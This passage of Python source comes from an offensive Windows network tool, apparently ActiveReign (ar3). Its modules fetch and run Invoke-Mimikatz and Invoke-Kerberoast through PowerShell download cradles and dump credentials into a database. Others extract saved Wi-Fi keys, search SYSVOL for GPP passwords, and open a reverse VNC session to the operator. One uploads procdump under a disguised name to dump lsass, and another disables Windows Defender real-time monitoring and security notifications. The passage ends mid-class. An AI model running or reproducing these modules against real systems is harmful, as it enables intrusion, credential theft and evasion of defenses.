    main_parser.add_argument('-D', '--debug', dest="debug", action='store_true', help='Show debug messages & failed login attempts')
    main_parser.add_argument('-T', dest='max_threads', type=int, default=55, help='Max number of threads to use')
    main_parser.add_argument('--host-max', dest='max_host_threads', type=int, default=20, help='Max threads per host')
    main_parser.add_argument('-W', dest='workspace', type=str, default='', required=False, help='Manually set workspace, otherwise defaults to config file')
    sub_parser = main_parser.add_subparsers(title=' \nOperational Modes\n\033[1;30m>>-------------------->\033[1;m', dest='mode')
    db_args(sub_parser)
    enum_args(sub_parser)
    shell_args(sub_parser)
    spray_args(sub_parser)
    query_args(sub_parser)
    args = main_parser.parse_args()
    if len(argv) <= 2: main_parser.print_help();exit(1)
    if args.debug:
        log_level = logging.DEBUG
    else:
        log_level = logging.INFO
    # Init console logger
    loggers = {}
    loggers['console'] = logger.setup_logger(log_level, 'ar3')
    # First checks & load config
    first_run_check(loggers['console'])
    config_obj = ConfigLoader()
    if not args.workspace:
        setattr(args, 'workspace', config_obj.WORKSPACE)
    first_workspace_check(args.workspace, loggers['console'])
    # Setup file logger
    loggers[args.mode] = logger.setup_file_logger(args.workspace, args.mode)
    # Setup secondary loggers - use argv since arg_mods haven't been made yet
    if '--spider' in argv:
        loggers['spider'] = logger.setup_file_logger(args.workspace, "spider")
    if '--gen-relay-list' in argv:
        loggers['relay_list'] = logger.setup_outfile_logger(args.gen_relay_list, "relay_list")
    # Setup DB
    db_obj = Ar3db(args.workspace, loggers['console'], args.debug)
    try:
        # Start
        # eval() builds a call like "enum_arg_mods(...)"; args.mode can
        # only be one of the subparser names registered above, so the
        # evaluated string is constrained to known functions.
        args = eval("{}_arg_mods(args, db_obj, loggers)".format(args.mode))
        if args.debug: logger.print_args(args, loggers['console'])
        ops = import_module("ar3.ops.{}".format(args.mode))
        ops.main(args, config_obj, db_obj, loggers)
    except KeyboardInterrupt:
        print("\n[!] Key Event Detected, Closing...")
        exit(0)
    except Exception as e:
        # Top-level catch-all: report and exit gracefully.
        print("[!] ActiveReign Error: {}".format(str(e)))
import re
from ar3.helpers import powershell
from ar3.logger import setup_file_logger
from ar3.helpers.misc import validate_ntlm
from ar3.ops.enum.host_enum import code_execution
from ar3.helpers.misc import get_local_ip, get_filestamp
class InvokeMimikatz():
    """
    AR3 module that runs Empire's Invoke-Mimikatz.ps1 on the target via a
    PowerShell download cradle, parses the credential output, stores
    recovered accounts in the workspace database, and saves the raw
    output to a per-target log file.
    """
    def __init__(self):
        self.name = 'Mimikatz'
        self.description = 'Execute PowerSpoits Invoke-Mimikatz.ps1'
        self.author = ['@m8r0wn']
        # Credential dumping requires local admin on the target.
        self.requires_admin = True
        self.exec_methods = ['wmiexec', 'smbexec']
        self.args = {
            'COMMAND': {
                'Description': 'Mimikatz Command to Run',
                'Required': False,
                'Value': 'privilege::debug sekurlsa::logonpasswords exit'
            }
        }

    def run(self, target, args, smb_con, loggers, config_obj):
        """Execute the module against *target* over the given SMB connection."""
        logger = loggers['console']
        timeout = args.timeout
        loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), 'Attempting Invoke-Mimikatz'])
        try:
            # Define Script Source: local HTTP server (fileless) or GitHub.
            # The timeout is raised to leave time for download + dump.
            if args.fileless:
                srv_addr = get_local_ip()
                script_location = 'http://{}/Invoke-Mimikatz.ps1'.format(srv_addr)
                setattr(args, 'timeout', timeout + 60)
            else:
                script_location = 'https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1'
                setattr(args, 'timeout', timeout + 25)
            logger.debug('Script source: {}'.format(script_location))

            # Setup PS1 Script
            cmd = """Invoke-Mimikatz -Command \"{}\"""".format(self.args['COMMAND']['Value'])
            launcher = powershell.gen_ps_iex_cradle(script_location, cmd)
            try:
                # Execute
                cmd = powershell.create_ps_command(launcher, loggers['console'], force_ps32=args.force_ps32, no_obfs=args.no_obfs, server_os=smb_con.os)
                results = code_execution(smb_con, args, target, loggers, config_obj, cmd, return_data=True)

                # Display Output
                if not results:
                    loggers['console'].fail([smb_con.host, smb_con.ip, self.name.upper(), 'No output returned'])
                    return
                elif args.debug:
                    for line in results.splitlines():
                        loggers['console'].debug([smb_con.host, smb_con.ip, self.name.upper(), line])

                # Parse results and send creds to db
                # cred = (credType, domain, username, password, hostname, sid)
                db_updates = 0
                for cred in self.parse_mimikatz(results):
                    if cred[0] == "hash":
                        smb_con.db.update_user(cred[2], '', cred[1], cred[3])
                        loggers['console'].success([smb_con.host, smb_con.ip, self.name.upper(),"{}\\{}:{}".format(cred[1],cred[2],cred[3])])
                        db_updates += 1
                    elif cred[0] == "plaintext":
                        smb_con.db.update_user(cred[2], cred[3], cred[1], '')
                        loggers['console'].success([smb_con.host, smb_con.ip, self.name.upper(),"{}\\{}:{}".format(cred[1], cred[2], cred[3])])
                        db_updates += 1
                loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), "{} credentials updated in database".format(db_updates)])

                # write results to file
                file_name = 'mimikatz_{}_{}.txt'.format(target, get_filestamp())
                tmp_logger = setup_file_logger(args.workspace, file_name, ext='')
                tmp_logger.info(results)
                loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), "Output saved to: {}".format(file_name)])
            except Exception as e:
                # "list index out of range" is how a failed parse surfaces.
                if str(e) == "list index out of range":
                    loggers['console'].fail([smb_con.host, smb_con.ip, self.name.upper(), "{} failed".format(self.name)])
                else:
                    loggers['console'].fail([smb_con.host, smb_con.ip, self.name.upper(), str(e)])
        except Exception as e:
            logger.debug("{} Error: {}".format(self.name, str(e)))

    def uniquify_tuples(self, tuples):
        """
        uniquify mimikatz tuples based on the password
        cred format- (credType, domain, username, password, hostname, sid)
        Stolen from the Empire project.
        """
        seen = set()
        return [item for item in tuples if
                "{}{}{}{}".format(item[0], item[1], item[2], item[3]) not in seen and not seen.add(
                    "{}{}{}{}".format(item[0], item[1], item[2], item[3]))]

    def parse_mimikatz(self, data):
        """
        Parse the output from Invoke-Mimikatz to return credential sets.
        This was directly stolen from the Empire project as well.
        """
        # cred format:
        # credType, domain, username, password, hostname, sid
        creds = []
        # regexes for "sekurlsa::logonpasswords" Mimikatz output
        regexes = ["(?s)(?<=msv :).*?(?=tspkg :)", "(?s)(?<=tspkg :).*?(?=wdigest :)",
                   "(?s)(?<=wdigest :).*?(?=kerberos :)", "(?s)(?<=kerberos :).*?(?=ssp :)",
                   "(?s)(?<=ssp :).*?(?=credman :)", "(?s)(?<=credman :).*?(?=Authentication Id :)",
                   "(?s)(?<=credman :).*?(?=mimikatz)"]

        hostDomain = ""
        domainSid = ""
        hostName = ""
        lines = data.split("\n")
        # The first two lines may carry the "Hostname: host.domain / SID" header.
        for line in lines[0:2]:
            if line.startswith("Hostname:"):
                try:
                    domain = line.split(":")[1].strip()
                    temp = domain.split("/")[0].strip()
                    domainSid = domain.split("/")[1].strip()
                    hostName = temp.split(".")[0]
                    hostDomain = ".".join(temp.split(".")[1:])
                except:
                    pass
        for regex in regexes:
            p = re.compile(regex)
            for match in p.findall(data):
                lines2 = match.split("\n")
                username, domain, password = "", "", ""
                for line in lines2:
                    try:
                        if "Username" in line:
                            username = line.split(":", 1)[1].strip()
                        elif "Domain" in line:
                            domain = line.split(":", 1)[1].strip()
                        elif "NTLM" in line or "Password" in line:
                            password = line.split(":", 1)[1].strip()
                    except:
                        pass
                if username != "" and password != "" and password != "(null)":
                    sid = ""
                    # substitute the FQDN in if it matches
                    if hostDomain.startswith(domain.lower()):
                        domain = hostDomain
                        sid = domainSid
                    if validate_ntlm(password):
                        credType = "hash"
                    else:
                        credType = "plaintext"
                    # ignore machine account plaintexts
                    if not (credType == "plaintext" and username.endswith("$")):
                        creds.append((credType, domain, username, password, hostName, sid))
        if len(creds) == 0:
            # check if we have lsadump output to check for krbtgt
            # happens on domain controller hashdumps
            for x in range(8, 13):
                if lines[x].startswith("Domain :"):
                    domain, sid, krbtgtHash = "", "", ""
                    try:
                        domainParts = lines[x].split(":")[1]
                        domain = domainParts.split("/")[0].strip()
                        sid = domainParts.split("/")[1].strip()
                        # substitute the FQDN in if it matches
                        if hostDomain.startswith(domain.lower()):
                            domain = hostDomain
                            sid = domainSid
                        for x in range(0, len(lines)):
                            if lines[x].startswith("User : krbtgt"):
                                krbtgtHash = lines[x + 2].split(":")[1].strip()
                                break
                        if krbtgtHash != "":
                            creds.append(("hash", domain, "krbtgt", krbtgtHash, hostName, sid))
                    except Exception as e:
                        pass
        if len(creds) == 0:
            # check if we get lsadump::dcsync output
            if '** SAM ACCOUNT **' in lines:
                domain, user, userHash, dcName, sid = "", "", "", "", ""
                for line in lines:
                    try:
                        if line.strip().endswith("will be the domain"):
                            domain = line.split("'")[1]
                        elif line.strip().endswith("will be the DC server"):
                            dcName = line.split("'")[1].split(".")[0]
                        elif line.strip().startswith("SAM Username"):
                            user = line.split(":")[1].strip()
                        elif line.strip().startswith("Object Security ID"):
                            parts = line.split(":")[1].strip().split("-")
                            sid = "-".join(parts[0:-1])
                        elif line.strip().startswith("Hash NTLM:"):
                            userHash = line.split(":")[1].strip()
                    except:
                        pass
                if domain != "" and userHash != "":
                    creds.append(("hash", domain, user, userHash, dcName, sid))
        return self.uniquify_tuples(creds)
from ar3.helpers import powershell
from ar3.logger import setup_file_logger
from ar3.ops.enum.host_enum import code_execution
from ar3.helpers.misc import get_local_ip, get_filestamp
class InvokeKerberoast():
    """
    AR3 module that runs Empire's Invoke-Kerberoast.ps1 on the target via
    a PowerShell download cradle, prints the output, and saves it to a
    per-target log file.
    """
    def __init__(self):
        self.name = 'Kerberoast'
        self.description = 'Use Empires invoke-kerberoasting module'
        self.author = ['@m8r0wn']
        self.credit = ['@EmpireProject']
        # Requires local admin for remote code execution.
        self.requires_admin = True
        self.exec_methods = ['wmiexec', 'smbexec', 'atexec']
        self.args = {}

    def run(self, target, args, smb_con, loggers, config_obj):
        """Execute the module against *target* over the given SMB connection."""
        logger = loggers['console']
        timeout = args.timeout
        loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), 'Attempting Invoke-Kerberoast'])
        try:
            # Define Script Source: local HTTP server (fileless) or GitHub.
            # The timeout is raised to leave time for the download.
            if args.fileless:
                srv_addr = get_local_ip()
                script_location = 'http://{}/Invoke-Kerberoast.ps1'.format(srv_addr)
                setattr(args, 'timeout', timeout + 30)
            else:
                script_location = 'https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1'
                setattr(args, 'timeout', timeout + 15)
            logger.debug('Script source: {}'.format(script_location))

            # Setup PS1 Script
            launcher = powershell.gen_ps_iex_cradle(script_location, '')

            # Execute
            cmd = powershell.create_ps_command(launcher, loggers['console'], force_ps32=args.force_ps32, no_obfs=args.no_obfs, server_os=smb_con.os)
            x = code_execution(smb_con, args, target, loggers, config_obj, cmd, return_data=True)

            # Display Output
            for line in x.splitlines():
                loggers['console'].success([smb_con.host, smb_con.ip, self.name.upper(), line])

            # write results to file
            file_name = 'kerberoast_{}_{}.txt'.format(target, get_filestamp())
            tmp_logger = setup_file_logger(args.workspace, file_name, ext='')
            tmp_logger.info(x)
            loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), "Output saved to: {}".format(file_name)])
        except Exception as e:
            logger.debug("{} Error: {}".format(self.name, str(e)))
from ar3.ops.enum.host_enum import code_execution
class WifiPasswords():
    """
    AR3 module that enumerates saved Wi-Fi profiles on the target with
    'netsh wlan show profiles' and dumps each profile's key material in
    clear text.
    """
    def __init__(self):
        self.name = 'wifi_passwords'
        self.description = 'Extract wifi passwords from system'
        self.author = ['@m8r0wn']
        # 'key=clear' output requires local admin on the target.
        self.requires_admin = True
        self.exec_methods = ['wmiexec', 'smbexec', 'atexec']
        self.args = {}

    def run(self, target, args, smb_con, loggers, config_obj):
        """Execute the module against *target* over the given SMB connection."""
        profiles = []
        logger = loggers['console']
        try:
            cmd = 'netsh wlan show profiles'
            results = code_execution(smb_con, args, target, loggers, config_obj, cmd, return_data=True).splitlines()

            # Quick n dirty error checking...
            if len (results) <= 1:
                logger.fail([smb_con.host, smb_con.ip, self.name.upper(), "{}: {}".format(self.name, results[0])])
                return

            # List all profiles
            for r in results:
                if r.strip().startswith('All User Profile'):
                    try:
                        # Profile name follows the colon, e.g. "All User Profile : MyWifi".
                        wifi = r.strip().split(":")[1]
                        profiles.append(wifi.lstrip().rstrip())
                    except:
                        pass

            # Get clear text passwords
            for p in profiles:
                try:
                    cmd = 'netsh wlan show profile name=\"{}\" key=clear'.format(p)
                    results = code_execution(smb_con, args, target, loggers, config_obj, cmd, return_data=True).splitlines()
                    for result in results:
                        # Only report the interesting fields of each profile.
                        if result.split(":")[0].strip() in ['SSID name', 'Authentication', 'Cipher', 'Key Content']:
                            logger.success([smb_con.host, smb_con.ip, self.name.upper(), result.lstrip()])
                            loggers[args.mode].info('Wifi_Passwords\t{}\t{}\t{}'.format(smb_con.host, smb_con.ip, result.lstrip()))
                except Exception as e:
                    logger.debug([smb_con.host, smb_con.ip, self.name.upper(), "{}: {}".format(self.name, str(e))])
        except Exception as e:
            logger.debug("{} Error: {}".format(self.name, str(e)))
from ar3.ops.enum.spider import spider
from ar3.logger import setup_file_logger
class GPP_Password():
    """AR3 module: spider a domain controller's SYSVOL share for Group
    Policy Preference XML files containing "cpassword" values."""
    def __init__(self):
        self.name = 'gpp_password'
        self.description = 'Looks for "cpassword" values in SYSVOL'
        self.author = ['@m8r0wn']
        self.requires_admin = False
        self.args = {
            'DC': {
                'Description' : 'Domain Controller (otherwise provided target will be used)',
                'Required' : False,
                'Value' : ''
            }
        }

    def run(self, target, args, smb_con, loggers, config_obj):
        """Configure and launch a spider over \\\\<target>\\SYSVOL.

        Matches are reported through the spider's own logging pipeline;
        this method only sets up the crawl parameters and kicks it off.
        """
        # Define Target: the optional DC module arg overrides the host
        # that was passed in.
        self.count = 0
        if self.args['DC']['Value']:
            target = self.args['DC']['Value']

        # Create custom spider config: restrict to .xml files and the
        # cpassword regex only.
        # NOTE(review): this binds a reference, not a copy -- the shared
        # config object is mutated for the rest of the run. Confirm this
        # is intentional.
        temp_config = config_obj
        temp_config.WHITELIST_EXT = ['xml']
        temp_config.KEY_EXT = []
        temp_config.KEY_WORDS = []
        temp_config.REGEX = {"gpp_password": "^.*cpassword=.*$"}

        # Override args: deep crawl, and disable the generic spider mode
        setattr(args, 'max_depth', 12)
        setattr(args, 'spider', False)

        # Create spider logger (spider() writes its hits through this)
        loggers['spider'] = setup_file_logger(args.workspace, "spider")

        # Start
        loggers['console'].info([smb_con.host, smb_con.ip, "GPP_PASSWORD", "Searching \\\\{}\\SYSVOL\\".format(target)])
        spider(args, temp_config, loggers, smb_con.db, target, 'SYSVOL')
        loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), "Module complete"])
def cpassword_parser(loggers, host, ip, filename, data):
    """Report credential-related attributes found in a matched GPP XML line.

    *data* is a whitespace-separated run of XML attributes; each attribute
    of interest (userName/newName/password/changed/cpassword) is printed,
    with cpassword values passed through cpassword_decrypt first.
    """
    loggers['console'].success([host, ip, "GPP_PASSWORD", "{:<9} : {}".format("File", filename)])
    for line in data.split(' '):
        if line.startswith(("userName", "newName", "password", "changed", "cpassword")):
            try:
                # Split on the FIRST '=' only: base64 cpassword values (and
                # passwords in general) may themselves contain '=' characters,
                # which the old unbounded split truncated.
                param, value = line.split('=', 1)
                value = value.strip('\"')
                if param == 'cpassword':
                    value = cpassword_decrypt(value)
                loggers['console'].success([host, ip, "GPP_PASSWORD", "{:<9} : {}".format(param.title(), value)])
            except:
                pass
def cpassword_decrypt(cpassword):
    """Placeholder for GPP cpassword decryption.

    Decryption of the AES-encrypted value is not implemented yet, so the
    encoded value is returned unchanged.
    """
    return cpassword
from ar3.helpers import powershell
from ar3.helpers.misc import get_local_ip
from ar3.ops.enum.host_enum import code_execution
class InvokeVNC():
    """AR3 module: stage the Empire Invoke-Vnc PowerShell script in memory
    to open a reverse or bind VNC session on the target."""
    def __init__(self):
        self.name = 'Invoke-VNC'
        self.description = 'Load VNC client into memory to create a session on the system'
        self.author = ['@m8r0wn']
        self.credit = ['@EmpireProject']
        self.requires_admin = True
        self.exec_methods = ['wmiexec', 'smbexec', 'atexec']
        self.args = {
            'CONTYPE' : {
                'Description' : 'Type of payload to use {reverse, bind}',
                'Required' : False,
                'Value' : 'reverse'
            },
            'IPADDRESS' : {
                'Description' : 'IP address of VNC listener',
                'Required' : False,
                'Value' : ''
            },
            'PORT' : {
                'Description' : 'VNC Port',
                'Required' : False,
                'Value' : '5900'
            },
            'PASSWORD' : {
                'Description' : 'VNC Password (Default: ar3vnc)',
                'Required' : False,
                'Value' : 'ar3vnc'
            }
        }

    def run(self, target, args, smb_con, loggers, config_obj):
        """Build an IEX download cradle for Invoke-Vnc, execute it on the
        target, and relay any output to the console logger.

        Failures are logged rather than raised so host enumeration continues.
        """
        cmd = ''
        logger = loggers['console']
        timeout = args.timeout
        loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), 'Attempting Invoke-VNC'])
        try:
            # Define Script Source: local web server (--fileless) or GitHub.
            # Timeout is extended because the VNC stager takes a while.
            if args.fileless:
                srv_addr = get_local_ip()
                script_location = 'http://{}/Invoke-Vnc.ps1'.format(srv_addr)
                setattr(args, 'timeout', timeout + 30)
            else:
                script_location = 'https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/management/Invoke-Vnc.ps1'
                setattr(args, 'timeout', timeout + 15)
            logger.debug('Script source: {}'.format(script_location))

            # Setup PS1 Script: reverse connections default the listener IP
            # to our local address when none was supplied.
            if self.args['CONTYPE']['Value'] == 'reverse':
                if not self.args['IPADDRESS']['Value']:
                    self.args['IPADDRESS']['Value'] = get_local_ip()
                cmd = """Invoke-Vnc -ConType reverse -IpAddress {} -Port {} -Password {}""".format(self.args['IPADDRESS']['Value'],self.args['PORT']['Value'],self.args['PASSWORD']['Value'])
            elif self.args['CONTYPE']['Value'] == 'bind':
                cmd = """Invoke-Vnc -ConType bind -Port {} -Password {}""".format(self.args['PORT']['Value'],self.args['PASSWORD']['Value'])
            else:
                # Bad module argument: this is a failure, not a success
                # (the original code logged it through .success()).
                loggers['console'].fail([smb_con.host, smb_con.ip, self.name.upper(), "Invalid CONTYPE"])
                exit(1)
            launcher = powershell.gen_ps_iex_cradle(script_location, cmd)

            # Execute
            cmd = powershell.create_ps_command(launcher, loggers['console'], force_ps32=args.force_ps32, no_obfs=args.no_obfs, server_os=smb_con.os)
            x = code_execution(smb_con, args, target, loggers, config_obj, cmd, return_data=True)

            # Display Output: x carries either the command output or a
            # "Code execution failed..." marker from code_execution().
            if not x.startswith('Code execution failed'):
                for line in x.splitlines():
                    loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), line])
            else:
                # Surface the actual failure instead of claiming "no output"
                loggers['console'].fail([smb_con.host, smb_con.ip, self.name.upper(), x])
        except Exception as e:
            logger.debug("{} Error: {}".format(self.name, str(e)))
import re
import os
import io
from time import sleep
from argparse import Namespace
from pypykatz.pypykatz import pypykatz
from contextlib import redirect_stdout
from pypykatz.lsadecryptor.cmdhelper import LSACMDHelper
from ar3.logger import setup_log_file
from ar3.ops.enum.host_enum import code_execution
from ar3.helpers.misc import get_filestamp, gen_random_string, get_local_ip
class ProcDump():
    """AR3 module: dump lsass.exe remotely with Sysinternals procdump.exe,
    retrieve the .dmp over SMB, and parse credentials locally with
    pypykatz."""
    def __init__(self):
        self.name = 'procdump'
        self.description = 'Uploads procdump.exe to system, captures lsass.exe, downloads & reads output locally using pypykatz'
        self.author = ['@m8r0wn']
        self.requires_admin = True
        self.exec_methods = ['wmiexec', 'smbexec']
        self.args = {}

    def run(self, target, args, smb_con, loggers, config_obj):
        """Orchestrate upload -> dump -> download -> cleanup -> parse.

        Remote artifacts are deleted in the finally block even when the
        dump step fails; parsing only runs if a non-empty .dmp was
        retrieved locally.
        """
        # Setup vars
        self.logger = loggers['console']
        self.loggers = loggers
        self.config_obj = config_obj
        # NOTE(review): duplicated by self.local_binary below; only
        # local_binary is referenced later.
        self.pd_binary = os.path.join(os.path.expanduser('~'), '.ar3', 'scripts', 'procdump.exe')
        self.smb_con = smb_con
        self.cmd_args = args
        # Remote staging location; paths are interpreted on the target, so
        # 127.0.0.1 refers to the target host itself. Share/path come from
        # the --exec-share/--exec-path command-line args.
        self.ip = '127.0.0.1'
        self.share = args.exec_share
        self.path = args.exec_path
        # Remote file paths: randomized names, binary disguised as .txt
        self.binary_name = gen_random_string() + ".txt"
        self.output_name = gen_random_string() + ".dmp"
        # Local file paths
        self.local_binary = os.path.join(os.path.expanduser('~'), '.ar3', 'scripts', 'procdump.exe')
        self.file_name = 'procdump_{}_{}.dmp'.format(target, get_filestamp())
        self.local_output = setup_log_file(args.workspace, self.file_name, ext='')

        try:
            self.procdump()
        except Exception as e:
            self.logger.fail([smb_con.host, smb_con.ip, self.name.upper(), e])
            return
        finally:
            # Best-effort cleanup of both staged files, even on failure
            try:
                self.logger.info([self.smb_con.host, self.smb_con.ip, self.name.upper(), "Deleting remote files"])
                self.smb_con.deleteFile(self.path + self.binary_name, self.share)
                self.smb_con.deleteFile(self.path + self.output_name, self.share)
            except:
                pass
        # Check for local dmp file, & parse
        if os.path.exists(self.local_output):
            if os.path.getsize(self.local_output) != 0:
                try:
                    self.logger.info([smb_con.host, smb_con.ip, self.name.upper(), "Parsing dump file: {}".format(self.file_name)])
                    self.parsedump(loggers, smb_con, self.local_output)
                except:
                    self.logger.fail([smb_con.host, smb_con.ip, self.name.upper(), "Error reading dump file: {}".format(self.file_name)])
            else:
                self.logger.fail([smb_con.host, smb_con.ip, self.name.upper(), "No data found, removing empty dmp file"])
                os.remove(self.local_output)
        else:
            self.logger.fail([smb_con.host, smb_con.ip, self.name.upper(), "Dmp file not found"])

    ##########################
    # Procdump logic
    ##########################
    def procdump(self):
        """Upload procdump.exe, execute the lsass dump remotely, and pull
        the resulting .dmp back to self.local_output.

        Raises:
            Exception: on missing local binary, failed upload/verification,
                execution error, or missing remote output.
        """
        # Check local binary exists for upload:
        if not os.path.exists(self.local_binary):
            raise Exception("Local procdump executable not found, run \"ar3 enum --reload\"")

        # Upload procdump (if applicable); verification failure usually
        # means AV removed the binary immediately.
        if self.upload_procdump():
            self.logger.info([self.smb_con.host, self.smb_con.ip, self.name.upper(),
                              "Uploaded procdump.exe to \\\\{}\\{}{}".format(self.ip, self.share, self.path + self.output_name)])
        if not self.verify_remoteFile(self.binary_name):
            raise Exception("Unable to verify procdump.exe in remote path, check system's AV settings")
        sleep(2)

        # Execute: -ma = full memory dump; extra timeout covers dump time
        try:
            setattr(self.cmd_args, 'timeout', self.cmd_args.timeout + 25)
            exec_path = "\\\\{}\\{}{}".format(self.ip, self.share, self.path + self.binary_name)
            remote_output = "\\\\{}\\{}{}".format(self.ip, self.share, self.path + self.output_name)
            cmd = '{} -accepteula -ma lsass.exe {}'.format(exec_path, remote_output)
            self.logger.info([self.smb_con.host, self.smb_con.ip, self.name.upper(), "Executing remote dump of lsass.exe"])
            results = code_execution(self.smb_con, self.cmd_args, self.smb_con.ip, self.loggers, self.config_obj, cmd, return_data=True)
            for x in results.splitlines():
                if x:
                    self.logger.info([self.smb_con.host, self.smb_con.ip, self.name.upper(), x])
        except Exception as e:
            raise Exception("Procdump execution error: {}".format(str(e)))
        sleep(2)

        # Download output
        if self.verify_remoteFile(self.output_name):
            self.logger.info([self.smb_con.host, self.smb_con.ip, self.name.upper(), "Downloading remote output..."])
            self.smb_con.downloadFile(self.path+self.output_name, self.local_output, self.share)
        else:
            raise Exception("Unable to verify dmp in remote path, check system's AV settings")
        sleep(2)

    def upload_procdump(self,):
        """Upload the local procdump binary to the remote staging path.

        Returns True on success; raises Exception on failure.
        """
        try:
            self.smb_con.uploadFile(self.local_binary, self.path+self.binary_name, self.share)
            return True
        except Exception as e:
            raise Exception('Unable to upload procdump.exe: {}'.format(str(e)))

    def verify_remoteFile(self, filename):
        """Return True if *filename* is present in the remote staging dir
        (case-insensitive directory listing comparison)."""
        found = False
        for x in self.smb_con.list_path(self.share, self.path + "*"):
            try:
                dir_file = x.get_longname().decode('UTF-8')
            except:
                dir_file = x.get_longname()
            if dir_file.lower() == filename.lower():
                return True
        return found

    ##########################
    # pypykatz dump parser
    ##########################
    def parsedump(self, loggers, smb_con, dumpfile):
        """Parse *dumpfile* with pypykatz and push recovered credentials
        into the database.

        pypykatz's console output is captured via redirect_stdout and then
        scraped by parse_output().
        """
        # Modified from:
        # https://github.com/awsmhacks/CrackMapExtreme/blob/a3a0ca13014b88dd2feb6db2ac522e2573321d6c/cmx/protocols/smb.py
        # & Inspiration by @HackAndDo aka Pixis for these parse bits
        arg = Namespace(outfile = False,
                        json = False,
                        grep = False,
                        kerberos_dir = False,
                        recursive = False,
                        directory = False)
        out = pypykatz.parse_minidump_file(dumpfile)
        f = io.StringIO()
        with redirect_stdout(f):  # Hides output
            LSACMDHelper().process_results({"dumpfile": out}, [], arg)

        logger = loggers['console']
        db_updates = 0
        for cred in self.parse_output(f.getvalue()):
            if cred['Password']:
                smb_con.db.update_user(cred['Username'], cred['Password'], cred['Domain'], '')
                logger.success([smb_con.host, smb_con.ip, self.name.upper(), "{}\\{}:{}".format(cred['Domain'], cred['Username'], cred['Password'])])
                db_updates += 1
            elif cred['Hash']:
                smb_con.db.update_user(cred['Username'], '', cred['Domain'], cred['Hash'])
                logger.success([smb_con.host, smb_con.ip, self.name.upper(), "{}\\{}:{}".format(cred['Domain'], cred['Username'], cred['Hash'])])
                db_updates += 1
        logger.info([smb_con.host, smb_con.ip, self.name.upper(), "{} credentials updated in database".format(db_updates)])
        logger.info([smb_con.host, smb_con.ip, self.name.upper(), "Dmp file saved to: {}".format(self.local_output)])

    def parse_output(self, output):
        """Extract (Domain, Username, Password, Hash) dicts from pypykatz
        console output; entries with values >= 128 chars are dropped to
        ignore kerberos material."""
        regex = r"(?:username:? (?!NA)(?P<username>.+)\n.*domain(?:name)?:? (?P<domain>.+)\n)(?:.*password:? (?!None)(?P<password>.+)|.*\n.*NT: (?P<hash>.*))"
        matches = re.finditer(regex, output, re.MULTILINE | re.IGNORECASE)
        credentials = []
        for match in matches:
            domain = match.group("domain")
            username = match.group("username")
            password = match.group("password")
            hashes = match.group("hash")
            if password and len(password) < 128 or hashes and len(hashes) < 128:   # Ignore kerberose
                credentials.append({'Domain'   : domain,
                                    'Username' : username,
                                    'Password' : password,
                                    'Hash'     : hashes})
        return credentials
from time import sleep
from ar3.ops.enum.host_enum import code_execution
from ar3.helpers import powershell
class KillDefender():
    """AR3 module: toggle Windows Defender real-time monitoring (and its
    security-center toast notifications) on the target."""
    def __init__(self):
        self.name = 'Kill Defender'
        self.description = 'Kill Windows Defender Real Time Monitoring'
        self.author = ['@m8r0wn']
        self.credit = ['@awsmhacks']
        self.requires_admin = True
        self.exec_methods = ['wmiexec', 'smbexec', 'atexec']
        self.args = {
            'ACTION': {
                'Description': 'disable: turn-off Defender | enable: re-enable defender',
                'Required': False,
                'Value': 'disable'
            }
        }

    def run(self, target, args, smb_con, loggers, config_obj):
        '''
        Full credit for kill-defender goes to @awsmhacks, amazing work!
        This was implemented in his project over at: https://github.com/awsmhacks/CrackMapExtreme

        Additional Resources:
        https://www.tenforums.com/tutorials/105486-enable-disable-notifications-windows-security-windows-10-a.html
        '''
        logger = loggers['console']
        logger.warning([smb_con.host, smb_con.ip, self.name.upper(), "This module is still in testing and not opsec safe..."])

        # Map the module ACTION to the notification toggle and the
        # Set-MpPreference boolean
        if self.args['ACTION']['Value'].lower() == 'disable':
            notify = "Enabled"
            action = "$true"
        elif self.args['ACTION']['Value'].lower() == 'enable':
            notify = "Disabled"
            action = "$false"
        else:
            loggers['console'].fail([smb_con.host, smb_con.ip, self.name.upper(), "Invalid module arg, only {enable, disable} allowed"])
            return

        # Registry write applied to every loaded user hive (HKU)
        kill_notify = """"FOR /F %a IN ('REG.EXE QUERY hku 2^>NUL ^| FIND ^"HKEY_USERS^"') DO REG.EXE add ^"%a\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Notifications\\Settings\\Windows.SystemToast.SecurityAndMaintenance^" /v ^"{}^" /d ^"0^" /t REG_DWORD /F" """.format(notify)
        kill_defender = 'Set-MpPreference -DisableRealtimeMonitoring {};'.format(action)
        kd_verify = 'Get-MpPreference |select DisableRealtimeMonitoring'

        try:
            # Modify notifications
            x = code_execution(smb_con, args, target, loggers, config_obj, kill_notify, return_data=True)

            # Modify Defender
            cmd = powershell.create_ps_command(kill_defender, loggers['console'], force_ps32=args.force_ps32, no_obfs=args.no_obfs, server_os=smb_con.os)
            x = code_execution(smb_con, args, target, loggers, config_obj, cmd, return_data=True)
            # Log message now matches the actual sleep duration below
            # (the original claimed 5 seconds but slept 8).
            loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), 'Execution complete, Sleeping 8 seconds for process shutdown...'])
            sleep(8)

            # Verify
            loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), 'Verifying Defender status...'])
            cmd = powershell.create_ps_command(kd_verify, loggers['console'], force_ps32=args.force_ps32,no_obfs=args.no_obfs, server_os=smb_con.os)
            x = code_execution(smb_con, args, target, loggers, config_obj, cmd, return_data=True)
            for line in x.splitlines():
                loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), line])
        except Exception as e:
            logger.debug("{} Error: {}".format(self.name, str(e)))
import re
from ar3.helpers import powershell
from ar3.logger import setup_file_logger
from ar3.helpers.misc import validate_ntlm
from ar3.ops.enum.host_enum import code_execution
from ar3.helpers.misc import get_local_ip, get_filestamp
class IronKatz():
    """AR3 module: run SafetyKatz via an embedded IronPython engine
